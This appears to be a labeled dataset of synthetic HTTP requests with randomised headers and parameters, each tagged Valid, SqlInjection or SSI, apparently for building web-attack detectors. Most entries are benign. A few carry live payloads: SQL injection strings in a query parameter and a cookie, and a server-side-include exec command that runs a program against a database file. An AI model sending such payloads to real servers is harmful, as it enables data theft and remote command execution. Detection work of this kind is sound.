Last-Modified: Mon, 14 Jun 04 11:46:38 UTC
Host: 248.137.208.182:95428
Connection: close
Accept: audio/basic, video/*, application/*
Accept-Charset: iso-8859-3;q=0.1, iso-10646-ucs-2, x-mac-japanese;q=0.4
Accept-Encoding: 
Accept-Language: Ooeh-skoR3pe, safcp-nF;q=0.6, ssaoeDd-Usa;q=0.3, iHb4ro-aAlSroer;q=0.3, 5rrstnoh-laqplnhe;q=0.3
Cache-Control: max-age=530
Client-ip: 229.106.129.24
Cookie: eSezce=m-hOKOSTp5K;elNAnaabfi=tnose
Cookie2: $Version="00"
Date: Sat, 18 Apr 09 20:42:18 UTC
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Tue, 29 Mar 05 20:05:11 CET
If-Unmodified-Since: Wed, 20 Sep 06 20:06:52 UTC
If-Match: "26AIBji.yAbNIKxlz"
If-None-Match: "-EKiJU11uKCir9FMjodf"
If-Range: Sun, 02 Apr 06 03:31:01 UTC
Max-Forwards: 2517
MIME-Version: 9.1
Pragma: nambOoa=ptS
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: NTLM cnFpMzNzSGJoZG9ob3VhYWF0clRyYWVyZnR0YWVpNHN6elhl
Range: 713-,7885-54
Referer: http://www.tsbine.it/onNwey/ingesnt/m3aansiI.tar.gz
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 0.2; i0-7r; rv:6.8.0) Gecko/90611063
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 6.4 www.ifmonntr.css
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 124.239.210.255
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

DaZYqFnH=yu]&cNeysrjnwbghl=0997036&stedtsnl1aeg=5953&GctSlRIisihnstg=a&6tss=xm&noiftt4=iframe5+window.opennudivdevjf0s7t]aly&Ee1ieeqenuM=gb3CmI&awoy5eeU2tvn= wtcopytnw\hctpchavingea%\&vg=7Hn&rene=7or&PwTe8=9207&hbe=jc6ehsn)&bMCchildXNgSVFc=eNciFndK9&feelihho6eriol=leilovshnHayieayR

End - Id: 34165
Start - Id: 42583
class: SqlInjection
GET /24et/tm4dJns/5wlzNroum/n9WbTLsOhUXdFW@60I/uD-R/AuiLtf4.css?TU2Z=niwafsLska%3Ffhwrmi%26child&p9nhr=661&m2Kz=vlV-nvOWfmdQ&bOaHokCib92lyn=97013368&Xgoafinn9o0ec=%27+++or++id++in+++++%28++++select+++++*+++from+++user_db++%29&D.JTPt=updateedropwblmsystemrU&iDvttllzsean6n=4768335&ftse8oti1LaoDnn=7199304462&jIIlib=toeOfl-liry%28t%3Cu&-.0ORpkNUxi0=451743206 HTTP/1.0
Host: www.ia3a9e.be
Connection: srruool
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate;q=0.2, gzip;q=0.8, deflate, identity
Accept-Language: aaiceo5-Qome, dbetnhg-ecekj, wstrze-6sme;q=0.9, vbacth-Emsr
Cache-Control: max-stale=9
Client-ip: 59.73.74.189
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="6"
Date: Tue, 16 Jun 09 12:25:49 GMT
ETag: "HhGZbuy.Xmq6SqA2ziN"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Wed, 10 Jun 09 15:04:01 GMT
If-Unmodified-Since: Sun, 01 Jan 06 24:54:21 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Feb 08 11:33:23 UTC
Max-Forwards: 8457
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic Nm9UYWV3c3I6bmUzYQ==
Authorization: Digest realm
Range: -327,463619-533,09-501926
Referer: http://www.t9ttTd.de/tey3r3rd/xo6q3lMt/09Mmaoi/w5obi.asmx
TE: trailers,trailers
Trailer: From
User-Agent: uciroslta/9.7.8
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 863x151
Via: HTTP/0.3 www.5hrc.jpg, HTTP/9.8 130.173.125.146, 8.4 www.cwoefurv.tiff
Transfer-Encoding: lo1mar; 6euosnh=treEoof1
Upgrade: ilaa/5.9, idlc4/7.8, uer/9.3, ttwuf/4.1, veDF/9.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42583
Start - Id: 23222
class: Valid
GET /cp-WRczJsmWKLk/ralTiietn/eopq_fXdwc/oi.irO/5lXOu34GndEXn4BZJ0k.pl?osatMes=naaizado&toocnsoxmroSw=9495526&D7insertSdivi2k3=+de&nt=%40ihU6Hi&li=%3E%2Fmo&tnantrsxoAmlajl=328&z8MngMQhMb=Lra&tat=nie5devln&INform_WE=dcv&oy_SnullDonode=sL6N._zggE&aet7l7epe3arw=ogro7&iI6BfX3u6fGscript=42&eQo5=rwpS&plr=%24ea4oa HTTP/1.0
Host: www.o2ne.ch
Connection: 8itme
Accept: application/rtf
Accept-Charset: x-mac-cyrillic;q=0.2, macintosh, iso-8859-7;q=0.4, hz-gb-2312
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 241.162.214.135
Cookie: ewazny3dhrbnt=slryyt;iznjegVdnsn=Raa;maioa=utwsock_streama9h;atoulmswhoh7=soLo3Cud
Cookie2: $Version="5"
Date: Sat, 14 May 05 14:51:06 UTC
ETag: "Z2BOKAVExq3LIHc3GR@"
Expect: 100-continue
From: aomoui@he6m.net
If-Modified-Since: Mon, 11 May 09 01:16:32 CET
If-Unmodified-Since: Tue, 29 Aug 06 23:57:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 478
MIME-Version: 8.2
Pragma: TnawnaRt=tstDj
Proxy-Authorization: Digest nonce
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -30,07-2
Referer: /gOdte/ssaeh/tIttqoEe/lOnE/oicu.sh
TE: deflate;q=0.6,trailers
Trailer: Via
User-Agent: rntpjds1Hn (hNiSkeR4)
UA-CPU: StrongARM
UA-Disp: 070,0093,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 973x7584
Via: HTTP/8.1 www.vrs9tNpl.tiff:2, sEs/5.9 193.236.23.253:4, uehuji/8.1 36.180.190.148
Transfer-Encoding: identity
Upgrade: ic7/9.0, xiebw/0.3, pdyeUH/1.9, 94kno/7.1, uMr/6.8
Warning: 866 www.iesEfey.jpg:21695 "zbyenndTms" "Fri, 26 Sep 08 08:03:01 UTC"
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 9726059
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23222
Start - Id: 27273
class: Valid
GET /oe/aeOIU1iHLE/r9wli4.png?ln=6+vuevtei%3F79tcLnrc&ne8pe=54569&mi=aqiS65s HTTP/1.0
Host: 49.132.111.151:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: oeesfn-arr, cyley65c-5nehnDj;q=0.2
Cache-Control: min-fresh=6702
Client-ip: 227.133.246.172
Cookie: eeo=120041938;lSSooastm8c6=ntoanllteyd;woSiisjne=054066970;eytthkoeob=Egrotot
Cookie2: $Version="881"
Date: Sun, 29 Nov 09 21:59:55 UTC
ETag: "7JUjHZa@ZZr.UhdzC"
Expect: 100-continue
From: leReh@DeoN7aa.de
If-Modified-Since: Tue, 27 Feb 07 08:18:46 CET
If-Unmodified-Since: Wed, 23 Mar 05 03:57:56 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Jul 04 22:15:47 CET
Max-Forwards: 479
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest nonce
Range: 1185-96,089-9,2490-
Referer: http://ehDvtn.ch/ntrabe/ntlqu/jreqrisl.cgi
TE: deflate;q=0.6,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.3 (X11; U; Solaris 3.0; gc-an; rv:2.9.4) Gecko/90312551
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 940x976
Via: 2.3 221.174.144.81:6224, rtd4/8.1 www.f4tfS0le.gif, uoaei/8.6 80.124.164.55
Transfer-Encoding: identity
Upgrade: abeo/1.7, hNice/0.8, onao/1.2, i1n/2.5, rho/8.7
Warning: 782 www.Uhsrchsr.jpg "soB0oaE" "Wed, 08 Nov 06 06:46:53 GMT"
X-Forwarded-For: 93.210.190.113
X-Serial-Number: 75164077038098175
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27273
Start - Id: 10647
class: Valid
GET /rmhit38eijiAhpnaee.tiff?R2=39786&ep4=4881966&tLsmotoe1nienft=isQ9m&c5=05264294&wNnZrleer=15133 HTTP/1.0
Host: 238.90.206.65
Connection: close
Accept: application/rtf;q=0.4, image/png
Accept-Charset: isiri-3342;q=0.5
Accept-Encoding: deflate;q=0.4, deflate;q=0.6, gzip, gzip
Accept-Language: *
Cache-Control: max-age=01
Client-ip: 32.175.87.240
Cookie: ulltplenst1se=zTe;rstnacaE=hdsxo6eoat;cirsori=WurjJflspoo;kdNs=W5wtetTs;meg=EtXpmhavingeh7lm;oehsehrt=mersystemqedMrhttps
Cookie2: $Version="106"
Date: Wed, 23 Sep 09 14:02:33 CET
ETag: W/"j5Ld_bHle1_l-iUR"
Expect: 100-continue
From: NWe3sao@jneted7.de
If-Modified-Since: Tue, 25 Nov 08 06:29:37 UTC
If-Unmodified-Since: Wed, 14 Feb 07 16:08:12 GMT
If-Match: "jOrrUytVvlCNdnOK"
If-None-Match: *
If-Range: Thu, 02 Dec 04 12:08:05 UTC
Max-Forwards: 05
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aXRlZWlhcjo5c2gw
Authorization: Basic ZmVHZ051czp6RGxB
Range: 6-0447,7686-38299,7705-
Referer: /taaeatrp/aknsra/aildE/sqaew.exe
TE: deflate;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: tzw1jirano
UA-CPU: 68000
UA-Disp: 492,6280,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4110x0979
Via: HTTP/2.2 www.r6r2o6i.jpg:9897
Transfer-Encoding: gzip
Upgrade: esd8yb/3.6, ebr7u/3.4, gieesh/7.2, iqtelo/1.1, oAp/5.7
Warning: 674 248.72.204.237 "qtwehtZfh" 
X-Forwarded-For: 224.80.134.105
X-Serial-Number: 975545371
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10647
Start - Id: 15322
class: Valid
GET /hN5W3tS-X/aO.zGvqrD_.XB1.bin? HTTP/1.1
Host: www.sedhEde.be
Connection: keep-alive
Accept: video/mpeg;q=0.3, video/*, text/*;q=0.6
Accept-Charset: iso-8859-5;q=0.6, iso-8859-9;q=0.8, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 102.215.170.42
Cookie: Ereednamvrepwu=aal;sa;sand4op8=xAz;etfithe=oqvNl.hv6FjF
Cookie2: $Version="3"
Date: Thu, 21 Feb 08 06:12:55 CET
ETag: "Y0YUWysM8GX6fXC8j"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Thu, 05 May 05 04:57:55 GMT
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: "1AP-dGaHg8C.t1_"
If-None-Match: *
If-Range: "Z8OTzTYs-i6-LSg3cKV0"
Max-Forwards: 7330
MIME-Version: 7.7
Pragma: teiaLbn=ttatH
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: yLu3l tXerU=oifn
Range: 604-0,1-54,-12
Referer: /ehMso/t7es0rl0/n1sj.cfm
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.7 (X11; U; Linux i386 0.1; bU-wM; rv:3.1.8) Gecko/96523318
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9424x098
Via: HTTP/1.3 www.tsih.png, 8.9 www.qei0ma.jpeg, 3.5 93.6.97.2
Transfer-Encoding: gzip
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 080 17.39.21.39 "2etaolnde" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15322
Start - Id: 14086
class: Valid
GET /sirewu2qttsacsh/e6ntear9Np.js? HTTP/1.0
Host: 213.224.148.228
Connection: close
Accept: audio/x-wav;q=0.6, image/gif;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: max-stale=43849
Client-ip: 69.27.156.46
Cookie: gGsehhmgara9r0=62384208
Cookie2: $Version="3"
Date: Tue, 24 Aug 04 19:21:50 GMT
ETag: W/"UFiJnE6S0QojGffT"
Expect: aPny=a7Ek
From: nuea@cnmet.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Sun, 19 Apr 09 22:30:57 UTC
If-Match: "zZ.q1ooxiPd13mvL_"
If-None-Match: *
If-Range: "i8l1K32ekPYS6di"
Max-Forwards: 43
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM aGR0ZWdvYXV0ZXNpNE1wZWVjbW5kaGVqVHVUYUxlbzA=
Authorization: Basic Y3NGVXRhOmh6dGFjOE4=
Range: 784942-,615-
Referer: http://mh5thes.net/tt2d8ycl.jpeg
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.8 (Windows; U; Windows NT 6.6; oy-8o; rv:4.3.6) Gecko/19535774
UA-CPU: StrongARM
UA-Disp: 091,777,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5013x5767
Via: 1.4 162.173.102.15, 0.6 156.106.230.76
Transfer-Encoding: deflate
Upgrade: eef2i/3.2, ser/9.6, hry/1.6, 2dctn0/3.8
Warning: 212 92.42.159.177:5 "tacideteon" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 7508201
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14086
Start - Id: 29406
class: Valid
GET /h@rAMA9ZT1@SX/x7X@1Q/dsHsfrnTunpr2/EI/aji4oyT.swf?nu1n5slorsnses=bsCsvI6O&Keaswacp3=gcBFm3vPfD&Gp=linkHo2%28w+3&rt0trfEdggf9n=oIhtif%7E%27tise7ec%5Du&hgtuoiLvse2bwh=c%7Cabapetstyleititr%3Dhx%2Blsr&t7nkdK=nbterf1mt&ttaomefET7e=pp5yG9VA25&HN5D-odb=oxmlsreplaceO&9pyhtN=3&6nab4n=8190&on=n%25uI%3Enxp_childer+NscriptIl&rtstUais6awl=nvPlQttk9 HTTP/1.1
Host: www.ittst.org
Connection: keep-alive
Accept: video/mpeg, audio/x-wav
Accept-Charset: iso-10646-ucs-2, isiri-3342, windows-1258
Accept-Encoding: identity;q=0.1, identity;q=0.2, identity;q=0.1, compress;q=0.5, gzip
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 36.136.49.82
Cookie: 2iTZR=tnht\nr<zcshutdownsi;ul=fimacceptaLwie&Smo(alva;lPbgstRrolo5oii=024691;.iAA.O=r(aoptopt0f&e~xnaiel<links;JZUj6V7==4aes'ystetr;oUv1lnww=e60eiscb
Cookie2: $Version="0"
Date: Fri, 16 Jan 04 06:31:57 CET
ETag: W/"Ms0L..T-rIrmu2RDg"
Expect: sttqoos=eeog5hvt;eyle
From: itme@cihdsh.st
If-Modified-Since: Thu, 14 Apr 05 05:02:08 GMT
If-Unmodified-Since: Sun, 06 Aug 06 03:46:12 UTC
If-Match: "Z0cy_sLHNeH6ZLUVm."
If-None-Match: *
If-Range: Wed, 21 Mar 07 17:07:29 GMT
Max-Forwards: 5243
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: Digest nonce
Range: 28212-
Referer: http://otrr.gov/nFodl/ieUrnp.fgf
TE: trailers
Trailer: Range
User-Agent: Mozilla/1.9 (compatible; xd5myr4eo; Linux i586; olRycl8e)
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0011x3310
Via: 6.1 1.243.110.61
Transfer-Encoding: gzip
Upgrade: r5nsd/8.4, eecerh/9.5
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 173.109.21.18
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 29406
Start - Id: 1090
class: Valid
GET /ejaon/rAbzCn8vx7K_4V4/cPAV04z8waAD1.tiff?h9rnfi=7asb7sweriyesr HTTP/1.0
Host: 43.78.219.34
Connection: ortYy
Accept: text/xml, video/*, video/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: niMiiw-egir, ajhseeT-NdAe9ei;q=0.2
Cache-Control: no-transform
Client-ip: 57.80.78.162
Cookie: Hod=67540440
Cookie2: $Version="356"
Date: Fri, 01 Jul 05 06:03:59 GMT
ETag: W/"24OIKzR5Cws.cTjN"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 29 Feb 04 14:18:17 GMT
If-Unmodified-Since: Tue, 29 Mar 05 23:19:18 GMT
If-Match: *
If-None-Match: "unhfcInXIh@eYH2F"
If-Range: "twttdXPLDQmQ.iFK9-"
Max-Forwards: 5
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest cnonce="hhireofc"
Range: -546949
Referer: /eased/hboe84fo/2vld/hkv2ni.pl
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (X11; U; Open BSD i386 8.8; cz-ta; rv:3.2.7) Gecko/73382203
UA-CPU: StrongARM
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8837x3320
Via: 9.9 www.lnalaset.tiff:3
Transfer-Encoding: compress
Upgrade: n3ex/4.8
Warning: 222 www.aosWke.js "i9rrOt4h" 
X-Forwarded-For: 161.112.181.42
X-Serial-Number: 0153270
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1090
Start - Id: 33391
class: Valid
PUT /2yZlabHbmtoioiolettv/r.amVyv-2G/t84@2Y/LAhtpassxksPhb/ke/4rosatstctntswabiPT/lCU3r/i0..f9Dab0yLb.php4? HTTP/1.0
Content-Length: 66
Content-Language: caaeee,ohzena,p
Content-Encoding: gzip
Content-Location: /seeIusri/lmosseid/xmzweIlE.sh
Content-MD5: cnNpYTd0bm9ub3RpOG1ydg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Mar 04 17:03:25 GMT
Last-Modified: Wed, 26 Jul 06 07:41:53 UTC
Host: www.eeipo.com
Connection: close
Accept: image/gif;q=0.6, image/gif
Accept-Charset: big5, iso-8859-8, utf-7
Accept-Encoding: 
Accept-Language: n-hratxs, slfDhte-dtzaodt;q=0.5, ed-sp0;q=0.1, t3tedhq-serpnp
Cache-Control: no-cache
Client-ip: 87.155.255.84
Cookie: taloh=61800
Cookie2: $Version="6"
Date: Mon, 15 Feb 10 23:16:50 CET
ETag: W/"c@Scju_I1DK2y7qy"
Expect: bztj=ueHn;eJAs=rctenez
From: ooydtlh@tuohEicue.de
If-Modified-Since: Tue, 23 Dec 08 05:43:30 CET
If-Unmodified-Since: Sat, 12 Apr 08 17:03:57 UTC
If-Match: "ynDFOhKCXQwmA4fpbz"
If-None-Match: "bkxmu6az1RGc61TrOBd"
If-Range: Mon, 01 Aug 05 13:05:45 GMT
Max-Forwards: 79
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic NThuc3NhajpuYW90bnRu
Authorization: Digest cnonce="nsSat6"
Range: 7289-656,71-060150
Referer: /aOsrnss.tar
TE: trailers
Trailer: Range
User-Agent: qy5yGjErjL http://www.2e8wnw.biz
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 811x2728
Via: FTP/4.0 164.252.51.122, 9.8 www.ti4v.tiff
Transfer-Encoding: compress
Upgrade: wcd8/1.3, hwe/0.4, aash/9.8, EsA/2.8
Warning: 454 98.218.12.151:008 "6Oim04" "Sat, 06 Nov 04 21:21:33 UTC"
X-Forwarded-For: 203.185.55.62
X-Serial-Number: 93235551323019151899
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lv=otm &JtndrwInbtCtxS=305&divChxD=FEombdmOesacso&tennCtsltWtD=5Gc

End - Id: 33391
Start - Id: 10921
class: Valid
GET /tJ7uwxn@/wwrdil/peEoEntinflq7d.dll?aemoinhws=tt.h9sI&lryes=m6passwdea&ge7kiq5hh7ePio=88199166&pyXgv1Ka4xhv=saccess_loghis HTTP/1.1
Host: 11.55.19.194
Connection: keep-alive
Accept: application/*, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-4rEl, i-ehral;q=0.2, wh8-sslr3;q=0.8
Cache-Control: rinr='hvhnaoe'
Client-ip: 135.137.137.193
Cookie: 4Oi8=dDo1aFX;9drrojt=log9s3ofn>ttalallk
Cookie2: $Version="930"
Date: Fri, 29 May 09 08:31:50 UTC
ETag: W/"SMtL2qKNalP0J.k"
Expect: 8lete
From: dmnba@sipo.net
If-Modified-Since: Thu, 19 Nov 09 09:39:02 GMT
If-Unmodified-Since: Tue, 03 Nov 09 13:38:46 UTC
If-Match: "By9aLQdr6KfA7Je"
If-None-Match: *
If-Range: "qqEaWxk3jGsPqAf"
Max-Forwards: 1493
MIME-Version: 0.9
Pragma: Lstae='re'
Proxy-Authorization: Basic TWFzZ3VyeWg6SU1hZ2Nl
Authorization: NTLM MnpsZWhtaXQ4YXJoeWVvYWRsaWRqbG11bGlvZWU2OG9z
Range: 588592-19738,0954-52796,229852-
Referer: /aOmVonca/h7fpi/e1roci/16eeamA/erNaes.txt
TE: trailers,deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/2.0 (X11; U; Linux i586 3.3; Og-nm; rv:6.4.0) Gecko/57676575
UA-CPU: PowerPC
UA-Disp: 7000,971,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5309x7001
Via: FTP/4.5 59.233.185.55, 7.4 www.ilehk.tiff, eeq/6.1 88.56.40.111
Transfer-Encoding: identity
Upgrade: xivl/0.5, eLO/6.4
Warning: 236 www.anncO0t.jpg "tlYaoiMnHeoasniuo" 
X-Forwarded-For: 135.5.6.65
X-Serial-Number: 847206508501943209
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10921
Start - Id: 35461
class: SqlInjection
PUT /ySyz6XndcO/asonser1Ngepa/accept0EOSF/axRG0apnevalh@AL3cX.html? HTTP/1.0
Content-Length: 213
Content-Language: 6asmbBa,eio4,o
Content-Encoding: identity
Content-Location: http://tupvus.biz/5ootmmg/tJxpahWr/irfiemz.pl
Content-MD5: aXRwaWVzNXNyb0VjbHVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Apr 09 15:31:38 CET
Last-Modified: Thu, 30 Dec 04 03:30:49 GMT
Host: 97.79.158.37
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.3, gzip;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 131.48.15.58
Cookie: n1dnph-5q1UDH=OR   'Rri'     =    '    ';erlcdAegodvec=18
Cookie2: $Version="4"
Date: Mon, 12 May 08 03:46:56 UTC
ETag: "xolVUWs5P4OEy9zc"
From: 33Fo@d99r.ch
If-Modified-Since: Sun, 05 Dec 04 11:03:38 UTC
If-Unmodified-Since: Tue, 20 Dec 05 19:01:40 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Sep 07 10:57:20 UTC
Max-Forwards: 94
MIME-Version: 5.0
Pragma: riigopvp='8A'
Authorization: Digest response="D59bf0ed07a4DbC736aA42F86113c8fF"
Referer: /oeit6.cfm
TE: trailers,trailers,trailers
User-Agent: eyd2eh4 (snA65sNI; m.3gda3; iDkuv4rqP@; duTxBctrht)
UA-Disp: 2633,975,32
UA-OS: WinNT
UA-Pixels: 1174x1297
Via: HTTP/6.1 www.puo95i.js:096, 4.2 www.te2o.png:7
Transfer-Encoding: gzip
Upgrade: A1R/8.3, aos/6.2, pI6/3.7
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

tasmLaes=021809&thbsbiihsl=gsmail2nodeSc)qsPuinoltwuss&os4ymzaSuoi=jR5GQ79du&iatymedtuhm1aid=oEsmiwr&WTxFSy7-=eerEkesaorxoe&uhGeiofesxdhse=wo8iMKO&rlcte1wdEoo71=ee&eroaewt=406&TGZqn5GW5=8982&raeeoxkdsehi=6721787

End - Id: 35461
Start - Id: 1948
class: Valid
GET /n1Cdba_29uE5YMeKPa3.mdb?thgzEnvttEcsi=21161827&e8teneaetmA=Eut%3BcopynD1sarmea&TjVhX=uejbcnmm&3X@8W0=543467 HTTP/1.0
Host: 128.195.51.226:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: lmseetoy-al, aQ7tih1-dN8ooAs, Cwy1ad7-tl;q=0.6, ItiENr1h-rds;q=0.6, 8o-fu10ie
Cache-Control: min-fresh=8104
Client-ip: 152.106.51.28
Cookie: uvtareMr9nyoiri=esD
Cookie2: $Version="71"
Date: Fri, 12 Nov 04 15:21:33 GMT
ETag: "5IM0a8wAua3B.5K8dP"
Expect: beodarf=Ylw6oeMa
From: eegL@aene5f.biz
If-Modified-Since: Fri, 21 Oct 05 18:04:32 CET
If-Unmodified-Since: Fri, 04 Apr 08 13:20:16 GMT
If-Match: "TE6cKGkRIuc-27@th7"
If-None-Match: "0wu8yiPfoBp.LqLc"
If-Range: "CPEuImimEJCGIK95YZK"
Max-Forwards: 4558
MIME-Version: 7.4
Pragma: pHgasel=fr3
Proxy-Authorization: NTLM cm5lYWVERHN0QWFuV2VubHJvZWVwcGhhdGtld2Z0eGVyb3NBZnJl
Authorization: 8erMn usNE=cpeNs1
Range: 0-,-750641
Referer: http://dcOuee.de/eefvdYi.png
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.3 (compatible; dfeq; Unix; e2Eeaseebi)
UA-CPU: Sparc
UA-Disp: 0367,7065,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1543x007
Via: 7.6 131.55.188.191:197, yei3nh/4.5 www.Ilren.htm:99987
Transfer-Encoding: biets
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 663 www.Libe.html "iztelp" "Wed, 09 May 07 24:02:00 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1948
Start - Id: 40244
class: SSI
GET /drrH-XWoW/o1i5ecch.dll?5vets8eiiN=eformynwlmhn&ent1nougl=629&ndghltnlySe=ef%40updatezaiatu5enEO HTTP/1.0
Host: 218.23.80.75:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: obdoy-Oiioi, uis-Heao, sSea9Iaa-eowd;q=0.7, oena-4hnh
Cache-Control: no-store
Cookie: smseriltm=<!--    #exec   cmd="c:\progra~1\isherc5m\rg\lEm.exe  d:\eeIA\www.ntleisan.org\to\database.mdb  /x  exporttofoxpro"-->
Cookie2: $Version="515"
Date: Thu, 04 Feb 10 06:04:30 GMT
ETag: "ixlqssAPAyPrM8GsZu"
Expect: eid5mat=aeeon
If-Match: "jUhDcyfrq3-qQz6dDM3"
If-None-Match: "zXkT0jDKmoSrdmcR9"
Max-Forwards: 83
Authorization: Basic THNFN3RpOnBocWFuZG8=
Range: -054879
Referer: http://sltaynaj.fr/ersxi/tnunos.jpeg
User-Agent: eecayb6/4.2.4.0

null

End - Id: 40244
Start - Id: 6230
class: Valid
POST /exohdmm6risNgseit/34rsk.qqX1zWWaUU/hlwhwAA_OXmIfvSQ-1M/ttShc16h5rZBFO/Ddatt8i9t/estOExitRafak4l4e/pMXjfB9rY9Kx7s@TJF0/9LX/e6tgM_a/aSsots2s8inioe9Ou5/ohfK1KH7onUvAT8pIRIw/2BMVxOauSo_.TMKE.jpeg? HTTP/1.1
Content-Length: 211
Content-Language: nsss,tetq
Content-Encoding: identity
